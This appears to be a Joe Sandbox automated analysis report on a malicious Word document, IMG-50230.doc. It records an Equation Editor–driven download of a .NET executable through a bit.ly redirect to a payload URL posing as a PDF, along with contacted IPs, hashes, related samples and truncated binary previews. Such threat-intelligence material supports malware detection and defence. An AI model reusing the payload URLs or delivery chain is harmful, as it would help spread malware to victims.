                                                                                                                                          high
                                                                                                                                          http://search.ipop.co.kr/favicon.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown

                                                                                                                                          Contacted IPs

                                                                                                                                          • No. of IPs < 25%
                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                          • 75% < No. of IPs

                                                                                                                                          Public

                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                          177.70.106.69
                                                                                                                                          unknownBrazil
                                                                                                                                          262545MandicSABRfalse
                                                                                                                                          67.199.248.11
                                                                                                                                          unknownUnited States
                                                                                                                                          396982GOOGLE-PRIVATE-CLOUDUStrue

                                                                                                                                          General Information

                                                                                                                                          Joe Sandbox Version:31.0.0 Emerald
                                                                                                                                          Analysis ID:344787
                                                                                                                                          Start date:27.01.2021
                                                                                                                                          Start time:06:50:32
                                                                                                                                          Joe Sandbox Product:CloudBasic
                                                                                                                                          Overall analysis duration:0h 10m 58s
                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                          Report type:full
                                                                                                                                          Sample file name:IMG-50230.doc
                                                                                                                                          Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                          Number of analysed new started processes analysed:10
                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                          Number of injected processes analysed:1
                                                                                                                                          Technologies:
                                                                                                                                          • HCA enabled
                                                                                                                                          • EGA enabled
                                                                                                                                          • HDC enabled
                                                                                                                                          • AMSI enabled
                                                                                                                                          Analysis Mode:default
                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                          Detection:MAL
                                                                                                                                          Classification:mal100.troj.expl.evad.winDOC@9/13@4/2
                                                                                                                                          EGA Information:Failed
                                                                                                                                          HDC Information:
                                                                                                                                          • Successful, ratio: 24.7% (good quality ratio 22.8%)
                                                                                                                                          • Quality average: 73.5%
                                                                                                                                          • Quality standard deviation: 30.8%
                                                                                                                                          HCA Information:
                                                                                                                                          • Successful, ratio: 96%
                                                                                                                                          • Number of executed functions: 86
                                                                                                                                          • Number of non-executed functions: 45
                                                                                                                                          Cookbook Comments:
                                                                                                                                          • Adjust boot time
                                                                                                                                          • Enable AMSI
                                                                                                                                          • Found application associated with file extension: .doc
                                                                                                                                          • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                          • Attach to Office via COM
                                                                                                                                          • Scroll down
                                                                                                                                          • Close Viewer
                                                                                                                                          Warnings:
                                                                                                                                          Show All
                                                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe
                                                                                                                                          • Excluded IPs from analysis (whitelisted): 172.217.23.36
                                                                                                                                          • Excluded domains from analysis (whitelisted): www.google.com
                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                          • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                                          Simulations

                                                                                                                                          Behavior and APIs

                                                                                                                                          TimeTypeDescription
                                                                                                                                          06:51:36API Interceptor103x Sleep call for process: EQNEDT32.EXE modified
                                                                                                                                          06:51:41API Interceptor76x Sleep call for process: 69577.exe modified
                                                                                                                                          06:51:51API Interceptor34x Sleep call for process: AddInProcess32.exe modified
                                                                                                                                          06:52:06API Interceptor127x Sleep call for process: rundll32.exe modified

                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                          IPs

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                          67.199.248.11IMG_761213.docGet hashmaliciousBrowse
                                                                                                                                          • bit.ly/36cLFZQ
                                                                                                                                          IMG-51033.docGet hashmaliciousBrowse
                                                                                                                                          • bit.ly/3a5RvO4
                                                                                                                                          IMG_688031.docGet hashmaliciousBrowse
                                                                                                                                          • bit.ly/3ojMXsu
                                                                                                                                          FedEx 77258441873.docGet hashmaliciousBrowse
                                                                                                                                          • bit.ly/39eF6Iw
                                                                                                                                          IMG_15506.docGet hashmaliciousBrowse
                                                                                                                                          • bit.ly/39f8K05
                                                                                                                                          RFQSDCL1005C1N5STDFM01.docGet hashmaliciousBrowse
                                                                                                                                          • bit.ly/2Y1IfVt
                                                                                                                                          file.rtfGet hashmaliciousBrowse
                                                                                                                                          • bit.ly/39M5sk2
                                                                                                                                          Contract Documents IMG_15603.docGet hashmaliciousBrowse
                                                                                                                                          • bit.ly/3bLif93
                                                                                                                                          Order IMG_7102.docGet hashmaliciousBrowse
                                                                                                                                          • bit.ly/2M6VrFR
                                                                                                                                          IMG_40317.docGet hashmaliciousBrowse
                                                                                                                                          • bit.ly/35T26uw
                                                                                                                                          Order IMG_501032.docGet hashmaliciousBrowse
                                                                                                                                          • bit.ly/38ZhgA5
                                                                                                                                          IMG_010357.docGet hashmaliciousBrowse
                                                                                                                                          • bit.ly/2M6Lubl
                                                                                                                                          IMG_80137.docGet hashmaliciousBrowse
                                                                                                                                          • bit.ly/2Necw17
                                                                                                                                          Soa.docGet hashmaliciousBrowse
                                                                                                                                          • bit.ly/2XW0prL
                                                                                                                                          IMG_06176.docGet hashmaliciousBrowse
                                                                                                                                          • bit.ly/3o1C9yN
                                                                                                                                          IMG_53091.docGet hashmaliciousBrowse
                                                                                                                                          • bit.ly/38TNzQV
                                                                                                                                          IMG_26017.docGet hashmaliciousBrowse
                                                                                                                                          • bit.ly/3p08Kqo
                                                                                                                                          FedEx 772584418730.docGet hashmaliciousBrowse
                                                                                                                                          • bit.ly/3quaS9X
                                                                                                                                          IMG_13791.docGet hashmaliciousBrowse
                                                                                                                                          • bit.ly/3qv6mbc
                                                                                                                                          PO_60577.docGet hashmaliciousBrowse
                                                                                                                                          • bit.ly/3sjh7PM

                                                                                                                                          Domains

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                          bit.lyIMG_155710.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.10
                                                                                                                                          IMG_761213.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.11
                                                                                                                                          IMG_4785.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.10
                                                                                                                                          IMG-51033.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.11
                                                                                                                                          IMG_688031.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.11
                                                                                                                                          IMG_68103.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.10
                                                                                                                                          DRAWING_22719.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.10
                                                                                                                                          FedEx 77258441873.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.11
                                                                                                                                          IMG_651023.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.10
                                                                                                                                          IMG_112237.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.10
                                                                                                                                          IMG_75513.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.10
                                                                                                                                          IMG_03991.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.10
                                                                                                                                          New Profit Distribution.pdf.lnkGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.10
                                                                                                                                          CN-2nd Reminder-XXXXX1894--02072020073335073781.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.10
                                                                                                                                          IMG_15506.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.11
                                                                                                                                          IMG_167749.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.10
                                                                                                                                          RFQSDCL1005C1N5STDFM01.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.11
                                                                                                                                          INVOICES & STATEMENTS_02201.htmGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.11
                                                                                                                                          file.rtfGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.11
                                                                                                                                          Contract Documents IMG_15603.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.11

                                                                                                                                          ASN

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                          GOOGLE-PRIVATE-CLOUDUSIMG_155710.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.10
                                                                                                                                          IMG_761213.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.11
                                                                                                                                          IMG_4785.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.10
                                                                                                                                          IMG-51033.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.11
                                                                                                                                          IMG_688031.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.11
                                                                                                                                          IMG_68103.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.10
                                                                                                                                          DRAWING_22719.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.10
                                                                                                                                          FedEx 77258441873.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.11
                                                                                                                                          IMG_651023.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.10
                                                                                                                                          IMG_112237.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.10
                                                                                                                                          IMG_75513.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.10
                                                                                                                                          IMG_03991.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.10
                                                                                                                                          New Profit Distribution.pdf.lnkGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.10
                                                                                                                                          CN-2nd Reminder-XXXXX1894--02072020073335073781.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.10
                                                                                                                                          IMG_15506.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.11
                                                                                                                                          IMG_167749.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.10
                                                                                                                                          RFQSDCL1005C1N5STDFM01.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.11
                                                                                                                                          INVOICES & STATEMENTS_02201.htmGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.11
                                                                                                                                          Enquiry 2021.pptGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.16
                                                                                                                                          file.rtfGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.11
                                                                                                                                          MandicSABRhttp://gruposuporte.com.br/#9053pl500@cez.czGet hashmaliciousBrowse
                                                                                                                                          • 177.70.106.24
                                                                                                                                          27Label_00384463.doc.jsGet hashmaliciousBrowse
                                                                                                                                          • 177.70.106.102
                                                                                                                                          27Label_00384463.doc.jsGet hashmaliciousBrowse
                                                                                                                                          • 177.70.106.102

                                                                                                                                          JA3 Fingerprints

                                                                                                                                          No context

                                                                                                                                          Dropped Files

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                          C:\Users\user\AppData\Local\Temp\AddInProcess32.exeIMG_155710.docGet hashmaliciousBrowse
                                                                                                                                            IMG_4785.docGet hashmaliciousBrowse
                                                                                                                                              IMG_688031.docGet hashmaliciousBrowse
                                                                                                                                                IMG_010357.docGet hashmaliciousBrowse
                                                                                                                                                  Soa.docGet hashmaliciousBrowse
                                                                                                                                                    IMG_06176.docGet hashmaliciousBrowse
                                                                                                                                                      IMG_50617.docGet hashmaliciousBrowse
                                                                                                                                                        TT Copy.docGet hashmaliciousBrowse
                                                                                                                                                          QL-0217.docGet hashmaliciousBrowse
                                                                                                                                                            RT-05723.docGet hashmaliciousBrowse
                                                                                                                                                              PIO-06711.docGet hashmaliciousBrowse
                                                                                                                                                                PO-JQ1125742021.xlsxGet hashmaliciousBrowse
                                                                                                                                                                  ORDER-45103.xlsGet hashmaliciousBrowse
                                                                                                                                                                    Debt Statement.xlsGet hashmaliciousBrowse
                                                                                                                                                                      SD-1061.xlsGet hashmaliciousBrowse
                                                                                                                                                                        NEW ORDER.xlsGet hashmaliciousBrowse
                                                                                                                                                                          exploit.docGet hashmaliciousBrowse
                                                                                                                                                                            invoice.docGet hashmaliciousBrowse
                                                                                                                                                                              BDO-1218.xlsGet hashmaliciousBrowse
                                                                                                                                                                                BDO-1218.xlsGet hashmaliciousBrowse

                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\IMG-50230[1].pdf
                                                                                                                                                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):839656
                                                                                                                                                                                  Entropy (8bit):5.8344795183177265
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12288:yHuICHfNbxpOHOKThJhHZ/ftciJKkEDZMfDnCEBBb8a2ong:yHuIS/OuWhJ/Vh8rCffBAn
                                                                                                                                                                                  MD5:BEB09E991A41577E79DFABC58178A44F
                                                                                                                                                                                  SHA1:88FB38266CF4DBDB6537082E0FCEDC1FF4070F59
                                                                                                                                                                                  SHA-256:80EE728FDCD057C60C2D67DDE0943F6FB227C6F521D98582843E5908E0437FF5
                                                                                                                                                                                  SHA-512:2926EBBAA31478A810B89D0A0B0024D10D405D8C561208838192374D94DF2FCFF78DD1D2BE7C75AEFA4045682DA463E31C2AD3DEE75CF40EAF27FB4CDC72774D
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  IE Cache URL:http://neuromedic.com.br/cgi./IMG-50230.pdf
                                                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z!.?.................Z...J.......x... ........@.. ....................................`..................................x..S........F...............)........................................................... ............... ..H............text....X... ...Z.................. ..`.rsrc....F.......H...\..............@..@.reloc..............................@..B.................x......H........N...)......G.................................................... :........%.....(......... .........%.....(.........*...0..........r...p(I...u............................(P...t....&.r...p(I...u....(I...u....&.....&............-R(....t....(I...u....-9....(....t................\.(P...t............(P...t....&.+k...............-K..........(P...t.... .ic..... .J..\(P...t............(I...u.............+......................+...................(....t............-......-..
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\3iWebUT[1].htm
                                                                                                                                                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):130
                                                                                                                                                                                  Entropy (8bit):4.749463400045454
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:qVvzLURODccZ/vXbvx9nDyiQ1wHZYmJG4rDLMBFSXbKFvNGb:qFzLIeco3XLx92iQ1w5YmJ3XMSLWQb
                                                                                                                                                                                  MD5:FDAFDFDBDC82294D3B8CECC8BCD4B073
                                                                                                                                                                                  SHA1:F1F2FB25A913FB4DC389B342724FD9E850F84518
                                                                                                                                                                                  SHA-256:19F4A633F5BB4288DF736245CA4351E3477A1153214005DCABBDD05C77079738
                                                                                                                                                                                  SHA-512:A53648152465DC2CB609C0B0DFD53A01227385DF8DBC9A0C7B1E57A592645A2DDDFA497C0FC107E5BA672ACF91ED25C91987C53913DF5C9FBF5FD470D226AB21
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Preview: <html>.<head><title>Bitly</title></head>.<body><a href="http://neuromedic.com.br/cgi./IMG-50230.pdf">moved here</a></body>.</html>
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0863C5D3-5908-4917-8FD7-8909E0160183}.tmp
                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2408770
                                                                                                                                                                                  Entropy (8bit):4.149210306759611
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12288:DWD+rVWDLrWWDLrVsWDLrVWDLrVWDorVWDLr1WDLrhWDLrVWDwr5WDyrVWDLrVWz:peLneteeiFjeaUedo7yeRaevkt20
                                                                                                                                                                                  MD5:CD2CF5CC7FA5B54697E64D78A0D4A3D0
                                                                                                                                                                                  SHA1:0CB24717E650EBE77C345ACE87E5ABB0AC38C3DA
                                                                                                                                                                                  SHA-256:949BAFAD3F17FC45F225736E08254CE0BB7911D5D3186D5CBD50C34B8AB816EA
                                                                                                                                                                                  SHA-512:D0A6C47684BCC029E0ADB81889E3E0A9261967588A12F5C78367D87E0164C6C7F43D28CF176CFD806C60A6950E12ED9F1B8C933259997D0FAFECC663EA208742
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Preview: ..@.Q.G.6.T.Z.C.U.e.f.7.7.h.z.7.v.S.@.-.y.i.R.K.B.Y.9.a.G.n.T.X.9.P.D.q.8.<.e.h.&.&.0._.M.-.D._.g.-.-._.-.d.,.6.4.>.3.6.8.4.5.$.C.v.>.y.t.=.n.5.|.:.%._.>.j.n.6.%.b.m.;.=.u.%.8.9...6.5..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . .
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{248D4A90-30CA-4646-ACFF-79FC9E14ADCB}.tmp
                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1024
                                                                                                                                                                                  Entropy (8bit):0.05390218305374581
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                                                                  MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                                                                  SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                                                                  SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                                                                  SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                                                  Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C2D3EB9C-AB70-4784-8852-5C03B64EE05D}.tmp
                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1536
                                                                                                                                                                                  Entropy (8bit):1.3586208805849453
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbt:IiiiiiiiiifdLloZQc8++lsJe1MzK
                                                                                                                                                                                  MD5:AFC2147AA9F1F702B94C0CBBE6D6AB79
                                                                                                                                                                                  SHA1:D73F6521026883B21BA56D9B2740C030F68E556B
                                                                                                                                                                                  SHA-256:D212226F515BEFDBEA665892274BD17682E3A1CC432CB99485C7B36EF2BE246D
                                                                                                                                                                                  SHA-512:CDD72BC889EF75AAE2E60D0AF5BC8BEF577F3EF754A15A028C5AC4E1D1AAE3E25F53EB3E7D224A8A310D2028502892CADC504E72BAB790D31A5B23E0D2712ADF
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
                                                                                                                                                                                  Process:C:\Users\Public\69577.exe
                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):42176
                                                                                                                                                                                  Entropy (8bit):6.200071124937496
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:/mdeeaAQ7dX6Iq8yFMyRd0lijbEBJoGs:/yejP7dORdS+bEBJoG
                                                                                                                                                                                  MD5:DA55A7AED2F65D6104E1A79EE067CC00
                                                                                                                                                                                  SHA1:B464DB0A153DCA4CC1F301490CD14345C15F5A0A
                                                                                                                                                                                  SHA-256:161BCBF5F7D766B70ACE9CDF7B3B250D256AB601720F09F4183A1FA4F92DCF54
                                                                                                                                                                                  SHA-512:2C33706030A7ABF1B15750B1A89BFD6A7B8D30CD9E83443565C9343DB511AA2CC5C689F24076A557AAEA67EC685DAC5183B6E54ED27224CAE98D2B4455095DA8
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                  • Filename: IMG_155710.doc, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: IMG_4785.doc, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: IMG_688031.doc, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: IMG_010357.doc, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: Soa.doc, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: IMG_06176.doc, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: IMG_50617.doc, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: TT Copy.doc, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: QL-0217.doc, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: RT-05723.doc, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: PIO-06711.doc, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: PO-JQ1125742021.xlsx, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: ORDER-45103.xls, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: Debt Statement.xls, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: SD-1061.xls, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: NEW ORDER.xls, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: exploit.doc, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: invoice.doc, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: BDO-1218.xls, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: BDO-1218.xls, Detection: malicious, Browse
                                                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....W..............0..X..........:w... ........@.. ....................................`..................................v..O....... ............f...>...........u............................................... ............... ..H............text...@W... ...X.................. ..`.rsrc... ............Z..............@..@.reloc...............d..............@..B.................w......H........#..,Q...................t.......................................0..K........-..*..i....*...r...p.o....,....r...p.o....-..*.....o......o.....$...*.....o....(....(......8...(....o......r...p.o.......4........o......... ........o......s.........o ...s!.....s".......r]..prg..po#.....r...p.o#.....r...pr...po#.........s.........($.....t@...r...p(%...&..r...p.(&...s'.......o(...&..o)....(*...o+.....&...(,....*.......3..@......R...s.....s....(-...*:.(......}P...*J.{P....o/..
                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\IMG-50230.LNK
                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:12 2020, mtime=Wed Aug 26 14:08:12 2020, atime=Wed Jan 27 13:51:34 2021, length=1332844, window=hide
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2018
                                                                                                                                                                                  Entropy (8bit):4.552369832845401
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:8K/XT3Ikuw/ArsrBnDBQh2K/XT3Ikuw/ArsrBnDBQ/:8K/XLIkurwrNBQh2K/XLIkurwrNBQ/
                                                                                                                                                                                  MD5:22EEDD7B1BAF686ED749EED44E73804E
                                                                                                                                                                                  SHA1:EBC06C36F3EC998C6A3F9EE9DAA4EDABE267D3BF
                                                                                                                                                                                  SHA-256:24959E8063760C6823E04E83C795D9DBB00822BB67EBD3CC546845BA9DB7CE93
                                                                                                                                                                                  SHA-512:B52D7A6EDCBD48EDD84B91DC0A2F080D8567B7DEBADE651DFB5D4C655938047323DBFDDAF2BC13F9A9BE91F073922C6D8260888C90A049C45F16FEAED6AB6D61
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Preview: L..................F.... .......{......{....K....lV...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....d.2.lV..;Rrv .IMG-50~1.DOC..H.......Q.y.Q.y*...8.....................I.M.G.-.5.0.2.3.0...d.o.c.......w...............-...8...[............?J......C:\Users\..#...................\\927537\Users.user\Desktop\IMG-50230.doc.$.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.I.M.G.-.5.0.2.3.0...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......927537..........D_....3N...W...9F.C...........[D_....3N...W...9F.C.......
                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):65
                                                                                                                                                                                  Entropy (8bit):4.194563874754362
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:M1JG4FS0Ay4FSmX1JG4FSv:MvEd2
                                                                                                                                                                                  MD5:BB29512164E91CE2515A67BB4C014FAB
                                                                                                                                                                                  SHA1:8BE8083C5F319E4258C243C7F67F61BD0AD551F6
                                                                                                                                                                                  SHA-256:60E1D333875605320E5D548041E50AE8BDACF2E5DC3A39F24B03BF108B31AD6C
                                                                                                                                                                                  SHA-512:20AFE76D3061308C4BA5D1F8414E979F35D3779EC65F96B817B1EEF53EE3BF18168F7E9FF5A418EE25B9572209F29149EDC9D282E23A83F44AEABA561312966B
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Preview: [doc]..IMG-50230.LNK=0..IMG-50230.LNK=0..[doc]..IMG-50230.LNK=0..
                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):162
                                                                                                                                                                                  Entropy (8bit):2.431160061181642
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                                                                                                                                                                  MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                                                                                                                                                  SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                                                                                                                                                  SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
